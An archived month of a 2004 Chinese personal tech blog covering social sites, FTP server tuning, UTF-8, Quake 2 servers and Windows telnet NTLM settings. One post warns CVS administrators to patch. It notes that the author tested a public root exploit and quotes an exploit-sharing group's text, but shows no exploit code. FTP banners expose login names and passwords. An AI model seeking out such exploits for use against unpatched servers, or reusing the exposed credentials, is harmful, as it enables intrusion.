« April 2004 | Main | June 2004 »
May 31, 2004
http://www.orkut.com 我爱网络
今天写写 orkutorkut 是指题目中的网址 http://www.orkut.com有人翻译作 喔酷 那么它是什么呢?可以说是一个交友网站 呵呵 而且是 google 下属的交友网站结识新朋友 不忘老朋友orkut 通过朋友、兴趣爱好建立庞大的社会网络是通过朋友建立的一个网上社区加入orkut需要朋友邀请加入 这点和google的gmail是一样的 谁让他们那么密切呢-----> 官方网页自己的定位 http://www.orkut.com/about.html is an online community website designed for friends. The main goal of our service is to make your social life, and that of your friends, more active and stimulating. orkut's social network can help you both maintain existing relationships and establish new ones by More...Posted by windtear at 1:23 AM
May 30, 2004
windtear.tk smth.tk 我爱网络
fireseed 在 .tk免费域名 给出了 *.tk 域名注册页面当时顺手就注了 windtear.tk把 smth.tk 和 tsinghua.tk 也注了他是通过 frame 设置 src 实现的比较不够大度 原比俺家 *.ipchina.org 小气不过对需要转向 或者记忆短小域名倒确是方便 傻瓜策略吧 呵呵-----> frame 参考<html><head><title>windtear.tk</title><meta name="description" content="windtear Perfect"><meta name="keywords" content="china, domain, ipchina, ipcn, proxy, smth, tsinghua, windtear"><script language = "JavaScript"><!-- hide startfunction popup() {window.open("http://banners.dot.tk/bmcbanner?fldpromonr=1&fldbannernr=0&flddomainnr=4122149&ip=221.218.17.83","bannerpopup","height=100,width=486,scrollbars=no");}// hide end --></script></head><frameset onLoad="JavaScript:popup()" rows="*,1" framespacing="0" border="0" frameborder="NO"><frame src="http://ipcn.org" name="dot_tk_frame_content" scrolling="auto" noresize></frameset><noframes><body></body></noframes></html>-----> email激活信发件人: "Dot TK registration center" <support@dot.tk> More...Posted by windtear at 12:43 AM
May 28, 2004
[!紧急警告]CVS管理员 我爱网络
论文取得了一些进展 慢慢恢复上网时间短短两周没上网 惊爆 CVS 漏洞恐怖的是 3 年前他们都做出来 exploit 了做人太不厚道了言归正传请CVS管理员注意 如果还么有升级cvs服务器赶紧升级主要针对用 cvs 并开放cvs仓库的我没仔细研究 只是编译 exploit 试了试普通的cvs服务器能直接通过运行权限执行任意指令http://groups.msn.com/FISHGroupsWelcome to FISH Groups !!! Welcome to FISHGroup's msn group!You can download these released exploits.And you can upload your pravite exploits.Or improve the released exploits for work on Korean/Japanese/Chinese Simplified /Chinese Traditional/French/Russian/Greman language OS etc.We'll check your exploits. Try your best!Thanks.FISHGroup2004.4.2805.20.CVS_Remote_Entry_Line_Heap_Overflow_Root_Exploit_(Linux_FreeBSD_Solaris)-FISHstable CVS releases up to 1.11.15 and More...Posted by windtear at 7:58 PM
May 24, 2004
水木清华的人祸天灾 我爱网络
BBS水木清华站长时间以来总在各种问题中度过曾经能连续在线数百小时的水木清华早已一去不复返了说到原因只能用人祸天灾来形容水木号称拥有28万用户 自我标榜为中国大陆最早的BBS在知识沉淀上的第一我绝对认同 而且二三年之内任何别人无法超越不过目前水木的定位和发展已经和以前发生了严重偏离和变化水木在走的是一条渐已失去控制的自杀之路水木有钱 水木死不了不过疯狂飞飙致伤也已无法复原当目前这一帮所谓为水木好的人渐渐退出水木闪光灯下水木面临的是什么 我说不好 至少该是个人仰车翻的惨痛结局说天灾还得回到人祸没有人祸 天灾也不成其为天灾天灾可以说硬件网络系统那人祸就是掌舵人的人祸了水木 走好 More...Posted by windtear at 1:17 AM
May 23, 2004
UTF-8 今天的主题 我爱网络
(注:今天是活动意义上的时间概念)为什么今天blog写这个题目呢首先今天LinuxApp版讨论了不少其次昨天忘了哪个版有人实验编码问题再次似乎今天windinsn在blog里面测试UTF-8编码引用...所以这么写blog才像 对吧 呵呵UTF-8 首先不能写错 比如别写成 UTF8 UTF_8UTF 代表 UCS Transformation FormatUCS 是指通用字符集 (Universal Character Set),是 ISO 10646 定义的所有其他字符集标准的一个超集玩Linux的应该对 GB2312 和 ISO 8859 不陌生 也许还知道 GBK GB18030 UTF-8 ... I18N L10N ...那么这些都是怎么回事呢?自己花时间去搜资料看吧呵呵我简单举个例子比如 google 是用 UTF-8 的假如我们搜索"ipcn 挑战杯"就可以看到这样的编码ipcn+%E6%8C%91%E6%88%98%E6%9D%AF%E6%8C%91 %E6%88%98 %E6%9D%AF就代表"挑战杯"这三个字要是GB2312编码的话 挑战杯就是 %CC%F4 %D5%BD %B1%AD做转换也非常方便---> 附 原来starw在某处玩的我发到Linux了我也会:)发信人: windtear (努力!奋斗!努力!奋斗!), 信区: Linux标 题: [FAQ] 把 %xx%xx... 改成中文的方法发信站: BBS 水木清华站 (Fri May 23 02:43:38 2003), More...Posted by windtear at 1:54 AM
May 22, 2004
xlight ftp server 性能示例 我爱网络
跑了8天 没有观察具体数据只好当做参考了综合管理考虑 还算不错遇到过一两次 ls 失败的情况 不知道是不是bug发信人: windtear (大决战 戒网 || 庆祝获得挑战杯一等奖), 信区: NewSoftware标 题: xlight 平均 2.27MBps 算什么行情发信站: BBS 水木清华站 (Fri May 21 19:35:39 2004), 站内不做速度限制 限制60用户平均跑到 2266.24 KBps似乎数据说明不了 xlight 什么问题220- 服务器当前连接数为 25,当前流量为 2912 KBps220- 累计下载: 1.455 TB220- 累计上传: 9.885 GB220- 平均流量: 2266.24 KBps220- 目前流量: 2912 KBps220-************************************************************220-FTP 服务已连续运行 7 Day, 23 Hour, 26 Minute220-此间共接受 14023 次成功连接220-************************************************************--发信人: windtear (大决战 戒网 || 庆祝获得挑战杯一等奖), 信区: NewSoftware标 题: Re: xlight 平均 2.27MBps 算什么行情发信站: BBS 水木清华站 (Fri May 21 19:45:33 2004), 站内我删了一些东西的============================================================ 你好,来自 %clientip 的朋友 服务器当前连接数为 %curusers,当前流量为 %cur_down_bw============================================================ Idle: %idle_timeout============================================================ 累计下载: %totaldown 累计上传: %totalup 平均流量: %avg_downspd 目前流量: %cur_down_bw************************************************************FTP 服务已连续运行 %runtime此间共接受 %logins_sum 次成功连接************************************************************【 在 hyne (hyne) 的大作中提到: 】: 帮你的铁上来,hoho发信人: hyne (hyne), 信区: NewSoftware标 题: Re: xlight 平均 2.27MBps 算什么行情发信站: BBS 水木清华站 (Fri May 21 19:54:48 2004), 站内看看偶的[R] 230-============================================================[R] 230- 你好,来自 10.64.130.66 的朋友[R] 230- 服务器当前连接数为 136,当前流量为 9160 KBps[R] 230-============================================================[R] 230- 累计下载: 191.042 GB[R] 230- 平均流量: 13236.58 KBps[R] 230- 目前流量: 9160 KBps[R] 230- 下载文件: 2459[R] 230- 当前时间: 19:49:11[R] 230-************************************************************[R] 230-FTP 服务已连续运行 0 天, 4 小时, 12 分钟[R] 230-此间共接受 1498 次成功连接[R] 230-************************************************************【 在 windtear (大决战 戒网 || 庆祝获得挑战杯一等奖) 的大作中提到: 】: 真遗憾: 跑了七八天: 忘了观察了: ...................发信人: hyne (hyne), 信区: NewSoftware标 题: Re: xlight 平均 2.27MBps 算什么行情发信站: BBS 水木清华站 (Fri May 21 20:01:24 2004), 站内cpu 35-44%ram 4Msys 11-26%主机名: FUDAN-Y8QK9EN9POS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise EditionOS 版本: 5.2.3790 Build 3790OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: hyne注册的组织: fudan产品 ID: 69813-640-5446682-45715初始安装日期: 2004-3-21, 15:47:44系统启动时间: 0 天 4 小时 19 分 20 秒系统制造商: 暂缺系统型号: 暂缺系统类型: X86-based PC处理器: 安装了 2 个处理器。 [01]: x86 Family 6 Model 5 Stepping 2 GenuineIntel ~448 Mhz [02]: x86 Family 6 Model 5 Stepping 2 GenuineIntel ~448 Mhz物理内存总量: 256 MB可用的物理内存: 69 MB页面文件: 最大值: 876 MB页面文件: 可用: 546 MB页面文件: 使用中: 330 MB页面文件位置: C:\pagefile.sys【 在 windtear (大决战 戒网 || 庆祝获得挑战杯一等奖) 的大作中提到: 】: 资源占用呢: 什么的: 要是有对比数据最好了: ...................发信人: windtear (大决战 戒网 || 庆祝获得挑战杯一等奖), 信区: NewSoftware标 题: Re: xlight 平均 2.27MBps 算什么行情发信站: BBS 水木清华站 (Fri May 21 20:05:05 2004), 站内 9.16MBps 136 conn 40% cpu*2 256M RAM 似乎挺好呀【 在 hyne (hyne) 的大作中提到: 】: cpu 35-44%: ram 4M: sys 11-26%: ...................发信人: hyne (hyne), 信区: NewSoftware标 题: Re: xlight 平均 2.27MBps 算什么行情发信站: BBS 水木清华站 (Fri May 21 20:08:07 2004), 站内平均13M,呵呵,100x2网卡【 在 windtear (大决战 戒网 || 庆祝获得挑战杯一等奖) 的大作中提到: 】: 9.16MBps: 136 conn: 40% cpu*2: ...................发信人: hyne (hyne), 信区: NewSoftware标 题: Re: xlight 平均 2.27MBps 算什么行情发信站: BBS 水木清华站 (Fri May 21 20:08:57 2004), 站内============================================================ 你好,来自 10.64.130.66 的朋友 服务器当前连接数为 124,当前流量为 14752 KBps============================================================ 累计下载: 202.755 GB 平均流量: 13264.51 KBps 目前流量: 14752 KBps 下载文件: 2614 当前时间: 20:04:05************************************************************FTP 服务已连续运行 0 天, 4 小时, 27 分钟此间共接受 1773 次成功连接************************************************************【 在 windtear (大决战 戒网 || 庆祝获得挑战杯一等奖) 的大作中提到: 】: 9.16MBps: 136 conn: 40% cpu*2: ...................-----> 最新% dateSat May 22 01:27:33 CST 2004You have new mail in /var/spool/mail/root% dateSat May 22 01:27:35 CST 2004% ftp ftp.ipcn.orgConnected to ftp.ipcn.org (166.111.154.22).220-Welcome to Windtear's TV FTP Server ...220-============================================================220- 你好,来自 166.111.154.35 的朋友220- 服务器当前连接数为 31,当前流量为 2032 KBps220-============================================================220- ftp://ftp.ipcn.org/220- ftp://ftp.ipchina.org/220- 浏览/上载帐号: 匿名或upload/upload 2/IP 20total220- 清华校内帐号: ipcn/windtear 1/IP 40total220- 清华校外帐号: ipchina/windtear 1/IP 20total220- Idle: 180220-============================================================220- 累计下载: 1.506 TB220- 累计上传: 9.885 GB220- 平均流量: 2275.52 KBps220- 目前流量: 2032 KBps220-************************************************************220-FTP 服务已连续运行 8 Day, 5 Hour, 21 Minute220-此间共接受 15330 次成功连接220-************************************************************220 Xlight Server 1.58 ready...Name (ftp.ipcn.org:root):-----> Xlight FTP服务器网络性能测试 (官方)http://www.xlightftpd.com/cn/performance.htmXlight FTP服务器网络性能测试 测试条件:Xlight FTP服务器运行在Intel赛扬1.2G,256M SDRAM内存的电脑上,网卡是100M Intel PRO 100+ ,操作系统是Windows2000专业版 (服务器用相对较差的电脑利于在性能测试中发现服务器软件的瓶颈). FTP客户端使用AMD 1.7G 256M DDR内存的电脑,网卡是100M 3Com 905TX,操作系统是Linux Redhat9.0. 客户和服务器通过D-Link DI-704路由器的10/100M Switch连在一个网段. 测试过程:FTP客户端用dkftpbench(http://www.kegel.com/dkftpbench/)软件,网上唯一的FTP Benchmark 软件,模拟1000个同时在线并下载文件的FTP客户流量,每个客户的带宽10K/s,测试文件是1M大小的x1000k.dat. 这个测试主要考验FTP服务器软件在大量用户同时传输文件时的网络传输效率,通常这是多数FTP服务器的一个重要性能瓶颈. 由于Windows操作系统和网络程序的调度和通知机制以及服务器编程效率的原因,FTP用户越多,大部分服务器的网络传输效率会下降很多,经常不能充分利用网络带宽. 尤其当服务器有超过300用户同时传输文件时,这种现象非常明显,常见的现象是用户下载速度不能保持住,忽快忽慢,服务器对请求响应迟缓. 由于UNIX进程调度机制的优势,这种情况在UNIX中有所改善,但是依然是大部分基于UNIX的FTP服务器一个重要瓶颈.FTP服务器同时在线用户1000,每个用户不断以保持在10K/s的速度同时下载x1000k.dat测试文件,服务器占用的发送带宽在8000-10000K/s之间变化,上图是其中一个时刻的截图.上图,Xlight FTP 服务器的CPU占用在70%-90%之间变化,服务器内存占用小于20M.上图,1000个用户以10K/s的速度同时不断下载x1000k.dat测试文件. 在1000个用户同时下载文件,网络占用带宽达到和接近10000K时,在本机用FTP客户软件作为第1001个用户连到Xlight FTP服务器,这个新用户依然可以得到很快的服务器响应速度,同时在本机环回传文件时这个用户的速度可以达到1500K/s, 如下图所示. 第1001个本本机用户用LeapFTP从服务器上下载文件此时的FTP服务器带宽此时的CPU占用,注意此时第1001个用户在本机环回测试使用的LeapFTP(FTP客户端软件)CPU占用达到17%,FTP服务器的CPU占用下降为65%严格来讲,这是性能测试,只有参考价值,和实际情况会有所不同. 这是因为测试中所有用户都下载x1000k.dat文件,x1000k.dat文件在内存中存在缓存,并不能代表在实际中FTP 服务器也能达到这样的性能,在实际中服务器硬盘的速度(随机寻道速度)和缓存以及硬盘类型(SCSI, IDE), 会对能够达到的带宽有很大影响. 大部分人可能并不需要太高性能的FTP服务器, 这个测试的最大意义并不在于FTP服务器能够同时承载多少用户,而是在较高用户数(超过300)正在同时下载时,是不是每个用户依然能以稳定的速度从FTP 服务器下载而不是速度忽快忽慢, 服务器响应是否足够快,以及CPU的占用. 这些会决定FTP服务器是否能够在很多用户下载时充分利用网络带宽和服务器的硬件.从这个测试可以看出Xlight FTP服务器有很高的网络效率,如果你的FTP服务器硬盘足够快,内存充足(操作系统需要内存用作硬盘数据预读缓存),你应该能够用Xlight FTP服务器承载超过绝大部分FTP服务器的同时在线用户数量和流量.[相关文章]http://www.smth.edu.cn/pc/pccon.php?id=10&nid=32263&s=all More...Posted by windtear at 1:35 AM
May 20, 2004
IPCN喜获挑战杯一等奖 我爱网络
热烈庆祝 IPCN 获得清华大学第二十二届“挑战杯”学生课外学术科技作品一等奖 (全校第4)我在小黑屋决战论文中 不过得到喜讯还是要出来庆祝一下近期喜讯不断发表paper半个月就收到录用通知三方协议户口顺利办理挑战杯获得一等奖 全校第4希望这个好运气能持续下去 保佑我毕业得奖感言现在没时间写了我会单独补上:)庆祝~~~http://student.tsinghua.edu.cn/news/news.asp?NewsID=6666第二十二届“挑战杯”竞赛结果 学生科协供稿 编辑 吕琪 2004-5-20 12:37:23 (132) 清华大学第二十二届“挑战杯”学生课外学术科技作品竞赛结果经过评审委员会评审,并由共青团清华大学委员会书记会审核批准,现予以公布:............3. 获奖作品一等奖(按名次排序,以下同):类别 作品名称 第一作者 院(系、协会)名称电类 Fly-Fire “火星探索者” 智能机器人电子设计平台 王晓峰 电子爱好者协会电类 DEEPEYES数字式立体摄像显示系统 周筠 电子工程系电类 S-Term 汪锐 自动化系电类 网络信息服务系统?D?DURI://IPCN.org 张秀岭 机械工程系机类 发动机运动机构演示装置及教学资料 尹志李立国 汽车工程系机类 “水精灵”?D新型液冷电脑散热器 胥蕊娜 热能工程系材化类 蝴蝶翅膀中光子带隙研究 曹婧 材料科学与工程系材化类 薄壁臭氧发生器 王铁超 材料科学与工程系水土类 宿舍中厅改造 张烨 建筑学院数理类 基于PLC的手机短信远程控制系统设计与实现 关歆、倪行洁、郑伟博 工程物理系注:材料系两件作品得分相同,并列材化类第一二等奖:类别 作品名称 第一作者 院(系、协会)名称电类 基于RISC+DSP的嵌入式系统 王?Q 自动化系电类 Internet Explorer 广告过滤插件 张旭 More...Posted by windtear at 5:22 PM
May 16, 2004
Quake 2 Server 的两种类型与三种模式 我爱网络
q2 是大二搬到28#后玩的一个网络游戏也是我玩过的三个游戏之一 (仙剑奇侠传 q2 XO)去年非典肆虐 憋在校内、宿舍的同学杀气冲天于是我开了3个 q2 server在厮杀中发泄 想起来真是令人荡气回肠好爽好爽Quake 2 Server 的两种类型与三种模式两种类型:(事实上当时还查了 Linux 下的 lxrun ) TOURNEY BG三种模式: dm deathmeath 1v1 dual team-----> TOURNEYK:\Quake2\quake2.exe +set dedicated 1 +set game tourney +exec ipcn_dm.cfg +set port 27910K:\Quake2\quake2.exe +set dedicated 1 +set game tourney +exec ipcn_1v1.cfg +set port 27911K:\Quake2\quake2.exe +set dedicated 1 +set game tourney +exec ipcn_team.cfg +set port 27912-----> BGK:\Quake2\quake2.exe +set dedicated 1 +set game bg +set deathmatch 1 +exec sever.cfg +map q2dm1-----> 附发信人: windtear (努力!奋斗!努力!奋斗!), 信区: BattleNet标 题: [公告] 35# Quake 2 Server (dm/1v1/team) 开放发信站: BBS 水木清华站 (Mon May 5 23:23:06 2003), 转信35# - Q2 - DM 166.111.154.22:2791035# - Q2 - 1v1 166.111.154.22:2791135# - Q2 - Team 166.111.154.22:2791224/7 开放比较前几天的改动如下:采用新的 server默认端口改为 deathmatch 模式另外单开 1v1 team 两个端口同时提供 Quake 2下载............标 题: 楼内开放q2 server发信站: 35# 虚拟世界 (2003年04月25日21:09:08 星期五), 站内信件............ More...Posted by windtear at 9:59 PM
May 14, 2004
RemoteAccess depends on RemoteRegistry & Server - RRAS(Routing and Remote Access Service) 我爱网络
RemoteAccessRRAS(Routing and Remote Access Service)RemoteRegistryRemote Registry Servicelatter is the necessary requirement of the formeralso Servernet start lanmanservernet start RemoteRegistrynet start RemoteAccessthen runrrasmgmt.mscto config More...Posted by windtear at 9:38 PM
May 13, 2004
[建议01-10] 赞美xlight 先提10条建议 我爱网络
发信人: windtear (论文), 信区: NewSoftware标 题: [转贴] [建议01-10] 赞美xlight 先提10条建议发信站: BBS 水木清华站 (Thu May 13 15:55:46 2004), 站内特意跑去 xlight 论坛发的转过来http://www.xlightftpd.com/cnforum/viewtopic.php?t=56&start=0&postdays=0&postorder=asc&highlight=作者 留言 windtear注册时间: 2004-05-13帖子: 1来自: 北京 发表于: Thu May 13, 2004 3:53 pm 发表主题: [建议01-10] 赞美xlight 先提10条建议 -------------------------------------------------------------------------------- 1. auto banned ip 可以控制,这个论坛前面提到几次了,这个feature非常重要,虽然大多服务器都7/24运行不需要管 2.welcome msg 支持大小1024B太小,建议增大, 另外建议提供更多参数,昨天试着做一个的serv-u 的移植,有些提示参数没法导、msg也不够 3.日志的处理 前面 neverbw 提了, 建议提供灵活的配置,这点serv-u做的可以借鉴:自定义log rotate screen/file 定制分离 4.[bug] 做成 service 后 无法控制 这个应该是个bug -showicon 即便调出icon也不能控制running server 补充: 这一块 经反复测试确认 是 rdp 登录的问题 本机 showicon 没问题 rdp/terminal 登录 -showicon 就不行了 我通过任务管理器看 了看: rdp 登录 -showicon 会以当前用户身份启动新的 xlight 进程 和 SYSTEM 身份运行的 xlight service 是"无关"的-runservice 后会以 SYSTEM 身份启动两个 xlight 进程本机登录 -showicon 进程数不会增加rdp登录 -showicon 会以当前用户身份启动新的 xlight 进程而且如果通过 ftp site server stop 后xilght -startall 也提示 duplicated 错误只能 net stop "xlight ftp server"net start "xlight ftp server"或者 先 -showicon 然后 图形化界面 点击 start all servers这里也建议 service 名字改一下 呵呵ixu 给出一个解释{ 这不是rdp的bug 这是by design 默认情况下rdp连接的session不是console session,是一个随机的名字 (不是很随机,但是这个名字会变化) 在服务选项中,有一个与桌面交互的选项,这个指的是console session里的桌面。 因为rdp的session名字都是变化的,可以有多个session, 鬼知道跟哪个session去交互?? 所以这个绝对不是bug, 解决方法是用rdp连接console session, 使用选项 mstsc /console}5.建议做一个定制参数 为了导入serv-u用户 做个特殊的SALT MD5,比如为用户定制2个字符 放在密码前然后md5保存 6.allow/deny 建议支持 ! 这个提议我自己也认为不很好 供参考 前面neverbw建议只禁止某些网段登录 如果 allow ! ip/mask 当于禁止也算不错 更加人性化了 虽然 access rule 非常强大 可以干"只有想不到 没有做不到" "只要你想" 的所有事 不过加一个 deny 还是必须 7.进站的 Xlight Server 1.58 ready... 如果能修改 的话 也是很不错的 很多ftpd多有这个 feature 对于恶意用户猜测主机信息很有好处 8.建议单个用户的允许改密码也加个定制,同前,尽管可以用acl做,不过可以相互照应,殊途同归,灵活意味着强大 9. max login same ip 的全局设置如果可以绕过特权用户就好了 目前用户的 adv 设置有个绕过设置,不过 maxlogin 那个直接在建立连接时就挡走了 这一块建议改改设计 10.拍一下马屁 xlight 太强悍了 小巧强悍, 作者应该是个linux高手吧 连帮助都很linux 呵呵,程序做的很好很好,尽管 xlight还有不少不够人性化 feature缺少的地方,不过不影响xlight的定位 赞一下作者 顺便也提一点建议:作为一个商业公司 或者商业运作,美工很重要,人性化 傻瓜也是重要的一块 前面提到那个所谓评测估计也是觉得xlight这一块空间还很大, 另外 商业软件 在帮助里面至少应该有 如何注册的说明 现在没有 帮助里面也应该告诉大家个人版和专业版的区别等等 总之 xlight 很强大 我是听 neverbw 等朋友介绍 今天熬夜试了试 惊呆了 过来赞一下 先随便提这些 我会继续关注的:) btw: 我是学生 一个网络技术、Linux技术...狂热爱好者:),所以我维护的好多服务器一般都用 linux ,ftpd 都用 proftpd vsftpd pure-ftpd 那些了,不过也(帮人等)维护着乱七八糟的一堆windows服务器(兴趣爱好吧 见笑) 作者能否送个用户呀:) hehe 自我吹捧完毕:P我相信 xlight 前(钱)途无限好 祝早日一统江湖~~~ -- ---== 上帝认证 ==---发信人: KCN (毒中之毒~life so hard), 信区: BoardManager标 题: Re: 增加了版面管理困难度发信站: BBS 水木清华站 (Mon Dec 29 14:33:45 2003), 转信 windtear的人品是可信的。恩...※ 来源:·BBS 水木清华站 smth.org·[FROM: 166.111.154.35] More...Posted by windtear at 3:56 PM
超强的 Xlight FTP Server - 小巧强悍 - 夸张的强 我爱网络
研究了三个多小时太强大了发信人: windtear (论文), 信区: NewSoftware标 题: 喊上一嗓子 xlight 太强太强了发信站: BBS 水木清华站 (Thu May 13 02:27:53 2004), 站内比那个 Serv-U 厉害大小serv-u daemon 3.3Mserv-u admin 2.8Mxlight alllll 276K功能xlight 的功能超级强大serv-u 有的 xlight 有 serv-u 没有的 xlight 还有配置由6个小文件组成 灵活强大发信人: windtear (论文), 信区: NewSoftware标 题: Re: 我也顶一下 xlight 小强啊 发信站: BBS 水木清华站 (Thu May 13 00:26:46 2004), 站内 本身帮助很强的 作者应该是个 linux 高手 帮助很实用 连注册都没写 多么专业的IT工程师啊 商业气息太缺 More...Posted by windtear at 3:06 AM
May 12, 2004
新的免费地址域20040511生效 我爱网络
发信人: windtear (论文), 信区: NetResources标 题: 友情提醒管理员 免费地址有变化发信站: BBS 水木清华站 (Wed May 12 17:48:39 2004), 站内关键是有所减少!提醒牵涉到流量费的管理员及时跟进http://netsupport.tsinghua.edu.cn/freeip.htm清华的免费地址 = nic 的免费地址主表 + 全部附表http://www.nic.edu.cn/RS/ipstat/internalip/别校可能不同发信人: windtear (论文), 信区: THUNet标 题: 20040511 清华大学免费地址变化发信站: BBS 水木清华站 (Wed May 12 15:16:21 2004), 站内-20040407+20040511-165.193.0.0/16+165.193.159.0/24-167.216.0.0/16+167.216.166.0/24-193.123.78.0/24-198.112.160.0/19-207.189.64.0/19+210.177.136.0/24-216.39.32.0/24+220.234.0.0/16-63.240.105.0/24-63.240.81.0/24-63.240.90.0/24-63.240.94.0/24全部附表附表大多是境外数据库的IP地址,请根据贵单位实际情况(如:图书馆等部门订阅)选择使用.ACS AIP CISCO EBSCO IEEE ISI LEXISNEXIS OCLC OVID PROQUEST STANFORD WILEY+128.84.158.0/24+132.174.1.0/24+132.174.11.0/24+138.12.4.0/24+140.98.193.0/24+140.98.194.0/24+149.28.1.0/24+165.193.159.0/24+167.216.166.0/24+167.68.6.0/23+171.66.120.0/21+192.195.245.0/24+192.58.150.0/24+192.80.71.0/24+192.84.75.0/24+193.194.158.0/24+194.130.252.0/24+195.22.150.0/23+195.27.123.0/24+195.27.130.0/24+195.27.60.0/24+199.164.217.0/24+199.4.154.0/23+199.98.88.0/24+204.179.122.0/24+205.240.244.0/22+205.243.231.0/24+207.24.42.0/24+208.215.179.0/24+210.177.136.0/24+216.143.112.0/24+216.33.115.0/24+216.52.36.0/23+63.84.162.0/24+63.86.118.0/23+64.124.183.0/24+65.246.184.0/23+66.179.148.0/24-----> freeip_mask_digit61.128.0.0/10218.0.0.0/11218.64.0.0/11219.128.0.0/11220.160.0.0/11202.192.0.0/12202.96.0.0/12210.32.0.0/12211.144.0.0/12211.80.0.0/12219.224.0.0/12220.192.0.0/12221.0.0.0/12221.224.0.0/12222.16.0.0/12202.112.0.0/13211.136.0.0/13211.160.0.0/13211.64.0.0/13211.96.0.0/13218.192.0.0/13218.240.0.0/13218.56.0.0/13219.216.0.0/13221.216.0.0/13222.136.0.0/13222.64.0.0/1361.48.0.0/13210.28.0.0/14210.72.0.0/14218.104.0.0/14218.200.0.0/14218.96.0.0/14219.244.0.0/14220.248.0.0/14221.196.0.0/14221.200.0.0/14221.208.0.0/14222.132.0.0/14222.160.0.0/14222.192.0.0/14222.76.0.0/14222.80.0.0/1461.232.0.0/1461.240.0.0/14202.120.0.0/15210.12.0.0/15210.26.0.0/15210.52.0.0/15210.76.0.0/15210.82.0.0/15218.204.0.0/15219.242.0.0/15221.192.0.0/15221.204.0.0/15221.214.0.0/15222.216.0.0/15222.72.0.0/1561.236.0.0/15137.189.0.0/16140.113.0.0/16143.89.0.0/16144.214.0.0/16147.8.0.0/16152.101.0.0/16152.104.0.0/16158.132.0.0/16158.182.0.0/16159.226.0.0/16161.207.0.0/16162.105.0.0/16166.111.0.0/16167.139.0.0/16168.160.0.0/16202.38.0.0/16203.93.0.0/16210.21.0.0/16210.22.0.0/16210.51.0.0/16210.78.0.0/16218.108.0.0/16219.72.0.0/16220.234.0.0/16220.252.0.0/16221.137.0.0/16221.194.0.0/16221.212.0.0/16222.218.0.0/16222.84.0.0/16202.127.128.0/17203.207.128.0/17210.15.0.0/17210.25.0.0/17202.127.0.0/18203.207.64.0/18210.14.192.0/18210.15.128.0/18210.25.128.0/18202.130.0.0/19202.130.224.0/19202.189.96.0/19202.4.128.0/19202.40.192.0/19202.45.32.0/19202.75.64.0/19202.95.0.0/19203.128.128.0/19203.192.0.0/19203.208.0.0/19203.87.224.0/19210.14.160.0/19210.192.96.0/19210.5.0.0/19210.79.224.0/19202.122.32.0/20202.131.208.0/20203.212.0.0/20203.81.16.0/2061.28.0.0/20171.66.120.0/21205.240.244.0/22167.68.6.0/23195.22.150.0/23199.4.154.0/23202.84.16.0/23216.52.36.0/2363.86.118.0/2365.246.184.0/23128.84.158.0/24132.174.1.0/24132.174.11.0/24138.12.4.0/24140.98.193.0/24140.98.194.0/24149.28.1.0/24165.193.159.0/24167.216.166.0/24192.195.245.0/24192.58.150.0/24192.80.71.0/24192.84.75.0/24192.86.104.0/24193.194.158.0/24194.130.252.0/24195.27.123.0/24195.27.130.0/24195.27.60.0/24199.164.217.0/24199.98.88.0/24204.179.122.0/24205.243.231.0/24207.24.42.0/24208.215.179.0/24210.177.136.0/24216.143.112.0/24216.33.115.0/2463.84.162.0/2464.124.183.0/2466.179.148.0/24 More...Posted by windtear at 6:03 PM
NTLM 验证机制 - smb telnet . service @ windows 我爱网络
首先演示一下 windows 的 telnet 服务D:\>tlntadmnMicrosoft (R) Windows 2000 (TM) (内部版本号 2195)Telnet Server Admin (Build 5.00.99201.1)请在下列选项中选择一个:0) 退出这个应用程序1) 列出当前用户2) 结束一个用户的会话 ...3) 显示 / 更改注册表设置 ...4) 开始服务5) 停止服务请键入一个选项的号码 [0 - 5] 以选择该选项: 3请在下列选项中选择一个:0) 退出这个菜单1) AllowTrustedDomain2) AltKeyMapping3) DefaultDomain4) DefaultShell5) LoginScript6) MaxFailedLogins7) NTLM8) TelnetPort请键入一个选项的号码 [0 - 8] 以选择该选项: 7NTLM 的当前值 = 0您确实想更改这个值吗 ? [y/n]yNTLM [ 当前值 = 0; 可接受的值 0、1 或 2 ] :2您确实想将 NTLM 设置为 : 2 ? [y/n]y只有当 Telnet 服务重新开始后设置才会生效请在下列选项中选择一个:0) 退出这个菜单1) AllowTrustedDomain2) AltKeyMapping3) DefaultDomain4) DefaultShell5) LoginScript6) MaxFailedLogins7) NTLM8) TelnetPort请键入一个选项的号码 [0 - 8] 以选择该选项: 0请在下列选项中选择一个:0) 退出这个应用程序1) 列出当前用户2) 结束一个用户的会话 ...3) 显示 / 更改注册表设置 ...4) 开始服务5) 停止服务请键入一个选项的号码 [0 - 5] 以选择该选项: 0D:\>net start tlntsvrTelnet 服务正在启动 .Telnet 服务已经启动成功。D:\>注意 NTLM 设置地方NTLM [ 当前值 = 0; 可接受的值 0、1 或 2 ] :2首先我们设置成 2 2 是只允许 NTLM 验证 0 是只允许 user/password 验证 1 是 NTLM 和 U/P 验证都允许D:\>telnet 127.0.0.1Microsoft (R) Windows 2000 (TM) 版本 5.00 (内部版本号 2195)欢迎使用 Microsoft Telnet ClientTelnet Client 内部版本号 5.00.99206.1Escape 字符为 'CTRL+]'您将要发送密码信息到 Internet 区域中的远程计算机。这可能不安全。是否还要发送(y/n):y*===============================================================欢迎使用 Microsoft Telnet 服务器。*===============================================================C:\>exit遗失对主机的连接。D:\>如果选 nServer allows NTLM authentication onlyServer has closed connection遗失对主机的连接。D:\>如果 NTLM 设置选的是 1 并且刚才输入 n 后 会让输入用户密码Microsoft (R) Windows (TM) Version 5.00 (Build 2195)Welcome to Microsoft Telnet ServiceTelnet Server Build 5.00.99206.1login:(相关注册表)REGEDIT4[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]"NTLM"=dword:00000000"TelnetPort"=dword:00000017如果不通过 tlntadmn 修改设置可以直接修改注册表1.修改注册表可以用 .reg2.或者用命令行小工具 reg.exe 18,944 02-12-21 21:57Console Registry Tool for Windows - version 3.0Copyright (C) Microsoft Corp. 1981-2001. All rights reservedREG Operation [Parameter List] Operation [ QUERY | ADD | DELETE | COPY | SAVE | LOAD | UNLOAD | RESTORE | COMPARE | EXPORT | IMPORT ]Return Code: (Except of REG COMPARE) 0 - Succussful 1 - FailedFor help on a specific operation type: REG Operation /?Examples: REG QUERY /? REG ADD /? REG DELETE /? REG COPY /? REG SAVE /? REG RESTORE /? REG LOAD /? REG UNLOAD /? REG COMPARE /? REG EXPORT /? REG IMPORT /?3.一个简单的修改C代码 来自nsfocus (http://www.nsfocus.net/index.php?act=sec_self&do=view&doc_id=392)- ------------------------ 